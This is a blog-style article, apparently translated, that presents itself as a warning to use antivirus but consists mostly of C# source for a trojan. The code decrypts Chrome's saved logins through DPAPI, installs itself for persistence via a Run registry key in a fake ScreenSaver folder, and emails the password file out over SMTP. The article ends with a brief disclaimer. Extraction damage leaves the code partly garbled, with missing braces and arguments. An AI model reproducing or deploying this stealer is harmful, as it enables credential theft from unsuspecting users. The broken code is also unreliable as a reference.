Basic virus in 20 minutes or why you should use antivirus


Nowadays, the threshold for entering the world of programming has fallen significantly - if earlier, at the dawn of the digital era, programming was something out of the ordinary, “the destiny of the elect,” today every student who knows how to google and confidently can write a keylogger or worm handling a computer. Without any special skills, you can create software that can cause a lot of trouble to PC users who, for one reason or another, neglect anti-virus programs.

Under cat is an example of writing such malware and a few thoughts on why it has become so accessible.

So, for starters, we formalize - which in the context of this article is considered under the concepts of "virus" and "worm". Formally, the concept of “virus” was first introduced in 1984 by Fred Cohen and it sounded like this:
We define a computer 'virus' as a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself

Later, he corrected his own definition, concentrating on the ability to self-propagate - i.e. to recursively copy program code. Thus, in a more fundamental sense, the virus was defined as a code, the execution of which will lead to the recording of a copy of this code on the tape of the Turing machine ahead of the execution, i.e. in future.
This definition is not entirely correct in relation to most modern viruses, because real viruses do not have to be copied recursively, and by and large even copied, but this model is considered classic and it is appropriate to use it to write a "spherical virus in a vacuum."

In addition, in 1992 in his articleCohen introduced a formal definition of a computer worm. A full formal definition can be found in the source, here I will only give a brief quote:
Recently, the term "worm" has been widely used to describe programs that automatically replicate and initialize interpretation of their replicas. 1 By contrast, the definition of viruses covers all self-replicating programs but does not address the manner in which replicas may be actuated .

Those. the reason for the worm to execute may not be the parent worm, but according to any trigger, for example, computer boot or timer.

In fact, the classification of viruses is much wider, and each virus falls into several categories at once, even just “trojans” have more than a dozen species . This is not about that.

We are realizing another virus in this galaxy. I will say right away that it will not work on real hardware protected by even a simple antivirus, but it clearly demonstrates the principles that underlie most virus programs.

The full code under the spoiler (carefully, there are many):

Spoiler heading
using System;
using System.Text;
using System.IO;
using System.Data.SQLite;
using System.Data;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Net.Mail;
using System.Net;
using Microsoft.Win32;
using System.Threading;

public class DPAPI
    [DllImport("crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
    private static extern
    bool CryptProtectData(ref DATA_BLOB pPlainText, string szDescription, ref DATA_BLOB pEntropy, IntPtr pReserved,
    ref CRYPTPROTECT_PROMPTSTRUCT pPrompt, int dwFlags, ref DATA_BLOB pCipherText);

    [DllImport("crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
    private static extern
    bool CryptUnprotectData(ref DATA_BLOB pCipherText, ref string pszDescription, ref DATA_BLOB pEntropy,
    IntPtr pReserved, ref CRYPTPROTECT_PROMPTSTRUCT pPrompt, int dwFlags, ref DATA_BLOB pPlainText);

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    internal struct DATA_BLOB
        public int cbData;
        public IntPtr pbData;

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public int cbSize;
        public int dwPromptFlags;
        public IntPtr hwndApp;
        public string szPrompt;

    static private IntPtr NullPtr = ((IntPtr)((int)(0)));

    private const int CRYPTPROTECT_UI_FORBIDDEN = 0x1;
    private const int CRYPTPROTECT_LOCAL_MACHINE = 0x4;

    private static void InitPrompt(ref CRYPTPROTECT_PROMPTSTRUCT ps)
        ps.cbSize = Marshal.SizeOf(
        ps.dwPromptFlags = 0;
        ps.hwndApp = NullPtr;
        ps.szPrompt = null;

    private static void InitBLOB(byte[] data, ref DATA_BLOB blob)
        // Use empty array for null parameter.
        if (data == null)
            data = new byte[0];

        // Allocate memory for the BLOB data.
        blob.pbData = Marshal.AllocHGlobal(data.Length);

        // Make sure that memory allocation was successful.
        if (blob.pbData == IntPtr.Zero)
            throw new Exception(
            "Unable to allocate data buffer for BLOB structure.");

        // Specify number of bytes in the BLOB.
        blob.cbData = data.Length;

        // Copy data from original source to the BLOB structure.
        Marshal.Copy(data, 0, blob.pbData, data.Length);

    public enum KeyType { UserKey = 1, MachineKey };

    private static KeyType defaultKeyType = KeyType.UserKey;

    public static string Encrypt(string plainText)
        return Encrypt(defaultKeyType, plainText, String.Empty, String.Empty);

    public static string Encrypt(KeyType keyType, string plainText)
        return Encrypt(keyType, plainText, String.Empty,

    public static string Encrypt(KeyType keyType, string plainText, string entropy)
        return Encrypt(keyType, plainText, entropy, String.Empty);

    public static string Encrypt(KeyType keyType, string plainText, string entropy, string description)
        // Make sure that parameters are valid.
        if (plainText == null) plainText = String.Empty;
        if (entropy == null) entropy = String.Empty;

        // Call encryption routine and convert returned bytes into
        // a base64-encoded value.
        return Convert.ToBase64String(

    public static byte[] Encrypt(KeyType keyType, byte[] plainTextBytes, byte[] entropyBytes, string description)
        // Make sure that parameters are valid.
        if (plainTextBytes == null) plainTextBytes = new byte[0];
        if (entropyBytes == null) entropyBytes = new byte[0];
        if (description == null) description = String.Empty;

        // Create BLOBs to hold data.
        DATA_BLOB plainTextBlob = new DATA_BLOB();
        DATA_BLOB cipherTextBlob = new DATA_BLOB();
        DATA_BLOB entropyBlob = new DATA_BLOB();

        // We only need prompt structure because it is a required
        // parameter.
        InitPrompt(ref prompt);

            // Convert plaintext bytes into a BLOB structure.
                InitBLOB(plainTextBytes, ref plainTextBlob);
            catch (Exception ex)
                throw new Exception(
                "Cannot initialize plaintext BLOB.", ex);

            // Convert entropy bytes into a BLOB structure.
                InitBLOB(entropyBytes, ref entropyBlob);
            catch (Exception ex)
                throw new Exception(
                "Cannot initialize entropy BLOB.", ex);

            // Disable any types of UI.
            int flags = CRYPTPROTECT_UI_FORBIDDEN;

            // When using machine-specific key, set up machine flag.
            if (keyType == KeyType.MachineKey)
                flags |= CRYPTPROTECT_LOCAL_MACHINE;

            // Call DPAPI to encrypt data.
            bool success = CryptProtectData(ref plainTextBlob,
            ref entropyBlob,
            ref prompt,
            ref cipherTextBlob);
            // Check the result.
            if (!success)
                // If operation failed, retrieve last Win32 error.
                int errCode = Marshal.GetLastWin32Error();

                // Win32Exception will contain error message corresponding
                // to the Windows error code.
                throw new Exception(
                "CryptProtectData failed.", new Win32Exception(errCode));

            // Allocate memory to hold ciphertext.
            byte[] cipherTextBytes = new byte[cipherTextBlob.cbData];

            // Copy ciphertext from the BLOB to a byte array.

            // Return the result.
            return cipherTextBytes;
        catch (Exception ex)
            throw new Exception("DPAPI was unable to encrypt data.", ex);
        // Free all memory allocated for BLOBs.
            if (plainTextBlob.pbData != IntPtr.Zero)

            if (cipherTextBlob.pbData != IntPtr.Zero)

            if (entropyBlob.pbData != IntPtr.Zero)

    public static string Decrypt(string cipherText)
        string description;

        return Decrypt(cipherText, String.Empty, out description);

    public static string Decrypt(string cipherText, out string description)
        return Decrypt(cipherText, String.Empty, out description);

    public static string Decrypt(string cipherText, string entropy, out string description)
        // Make sure that parameters are valid.
        if (entropy == null) entropy = String.Empty;

        return Encoding.UTF8.GetString(
        out description));

    public static byte[] Decrypt(byte[] cipherTextBytes, byte[] entropyBytes, out string description)
        // Create BLOBs to hold data.
        DATA_BLOB plainTextBlob = new DATA_BLOB();
        DATA_BLOB cipherTextBlob = new DATA_BLOB();
        DATA_BLOB entropyBlob = new DATA_BLOB();

        // We only need prompt structure because it is a required
        // parameter.
        InitPrompt(ref prompt);

        // Initialize description string.
        description = String.Empty;

            // Convert ciphertext bytes into a BLOB structure.
                InitBLOB(cipherTextBytes, ref cipherTextBlob);
            catch (Exception ex)
                throw new Exception(
                "Cannot initialize ciphertext BLOB.", ex);

            // Convert entropy bytes into a BLOB structure.
                InitBLOB(entropyBytes, ref entropyBlob);
            catch (Exception ex)
                throw new Exception(
                "Cannot initialize entropy BLOB.", ex);

            // Disable any types of UI. CryptUnprotectData does not
            // mention CRYPTPROTECT_LOCAL_MACHINE flag in the list of
            // supported flags so we will not set it up.
            int flags = CRYPTPROTECT_UI_FORBIDDEN;

            // Call DPAPI to decrypt data.
            bool success = CryptUnprotectData(ref cipherTextBlob,
            ref description,
            ref entropyBlob,
            ref prompt,
            ref plainTextBlob);

            // Check the result.
            if (!success)
                // If operation failed, retrieve last Win32 error.
                int errCode = Marshal.GetLastWin32Error();

                // Win32Exception will contain error message corresponding
                // to the Windows error code.
                throw new Exception(
                "CryptUnprotectData failed.", new Win32Exception(errCode));

            // Allocate memory to hold plaintext.
            byte[] plainTextBytes = new byte[plainTextBlob.cbData];

            // Copy ciphertext from the BLOB to a byte array.

            // Return the result.
            return plainTextBytes;
        catch (Exception ex)
            throw new Exception("DPAPI was unable to decrypt data.", ex);
        // Free all memory allocated for BLOBs.
            if (plainTextBlob.pbData != IntPtr.Zero)

            if (cipherTextBlob.pbData != IntPtr.Zero)

            if (entropyBlob.pbData != IntPtr.Zero)

public class Chrome

    static string filename = "passwords.html";
    static string db_way = "Login Data"; //    

    static string wayToDir = @"Screens\";
    static string wayToScreen;
    static string finalDir = @"C:\Program Files (x86)\Windows\ScreenSaver\";
    static void Main(string[] args)
        Thread.Sleep(5 * 60 * 1000);
    static void Registr()
        string way = Environment.GetCommandLineArgs()[0];

            if (!Directory.Exists(finalDir))
                foreach (string iter in Directory.GetFiles(Environment.CurrentDirectory))
                   // Console.WriteLine(iter);
                    string nameOfFile = iter.Split('\\')[iter.Split('\\').Length - 1];
                    File.Copy(iter, finalDir + nameOfFile, true);
                Directory.CreateDirectory(finalDir + "x64");
                Directory.CreateDirectory(finalDir + "x86");
                File.Copy(Environment.CurrentDirectory + "\\x64\\SQLite.Interop.dll", finalDir + "\\x64\\SQLite.Interop.dll");
                File.Copy(Environment.CurrentDirectory + "\\x86\\SQLite.Interop.dll", finalDir + "\\x86\\SQLite.Interop.dll");

                const string name = "SoftWare";
                string ExePath = finalDir + "soft.exe";
                File.Copy(way, ExePath, true);
                RegistryKey reg;
                reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
                    reg.SetValue(name, ExePath);
                {   }

        {   }
    static void Generate()
            string way_to_original = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data";
            File.Copy(way_to_original, "Login Data", true);

            StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);

            string db_field = "logins"; //  
            byte[] entropy = null; //    .
                                   //  DPAPI      ,
                                   //   -  ,  .
            string description; //       ,     .
            string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
            DataTable DB = new DataTable();
            string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");

            using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
                SQLiteCommand command = new SQLiteCommand(sql, connect);
                SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
                int rows = DB.Rows.Count;

                for (int i = 0; i < rows; i++)
                    Writer.Write(i + 1 + ") "); //        "--". 
                    Writer.WriteLine(DB.Rows[i][1] + "<br>"); //   
                    Writer.WriteLine(DB.Rows[i][3] + "<br>"); // 
                    byte[] byteArray = (byte[])DB.Rows[i][5];
                    byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
                    string password = new UTF8Encoding(true).GetString(decrypted);
                    Writer.WriteLine(password + "<br><br>");


        {   }

    static void Send()
        MailAddress from = new MailAddress("l**************", "Passwords");
        MailAddress to = new MailAddress("a***********");
        MailMessage m = new MailMessage(from, to);
        m.Subject = (DateTime.Now).ToString();
        m.Body = "";
        m.IsBodyHtml = true;
        SmtpClient smtp = new SmtpClient("", 587); ;
        smtp.Credentials = new NetworkCredential("l*****************", "q********l");
        smtp.EnableSsl = true;
        ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
        m.Attachments.Add(new Attachment(filename));
        catch { }


Most of the code for decrypting the password is taken from the corresponding article on storing passwords in Chrome , which, in fact, is easy to google and be in the public domain.

All that would be left to turn this software product into a trojan is to add the ability to “infect” a computer with it without the user's knowledge, add some triggering condition, and teach to send stolen information to some remote server.
Accordingly, in main, each of the stages is well tracked. In the Registr function, the program copies itself to the service folder and registers itself at startup when the operating system boots, in the Generate block it generates a file with passwords and logins, everything is a bit confusing, but most of the code used here is copied from open sources. The code is commented on in place, here I see no reason to repeat. And finally, the Send function sends the password file to the specified mail. The code also does not require deep knowledge of sockets and the TCP / IP stack - in .NET everything is pretty nicely wrapped in a high-level class for working with mail. If necessary, you can transfer data to any of the protocols, including POST requests and FTP server, but that would not have to raise the server - you can use the mail.

As a result, after half an hour of working with the code, we got a full-fledged trojan, which, of course, is caught by antiviruses, but if you do not take this into account, it works perfectly correctly. And at one time, writing such a program took many hundreds of lines of code. Now it took a couple of dozen minutes.

Is this good or bad? The question is very open, because on the one hand, a decrease in the level of entry into the profession increases the influx of personnel, recently it has become easier to write a working program, respectively, there have been more programs, and in a market economy this is certainly good, because competition improves quality. On the other hand, a low entry threshold means a large number of low- and medium-skilled personnel, because of which the quality of software products remains lower than desired, even taking into account all the tools that facilitate the work of the developer - modern high-level programming languages, integrated development environments, debuggers, etc. .

Well, of course - since there are more software products, there are more viruses. Of course, a neat and attentive user usually knows how to avoid them - he doesn’t follow the links from the letters and does not insert unverified flash drives. But the fact remains - now, when every high school student knows how to write a basic virus - antiviruses have become more popular than a couple of decades ago.

The author in no way recommends creating malicious software and recalls that illegal access to private information is prosecuted.

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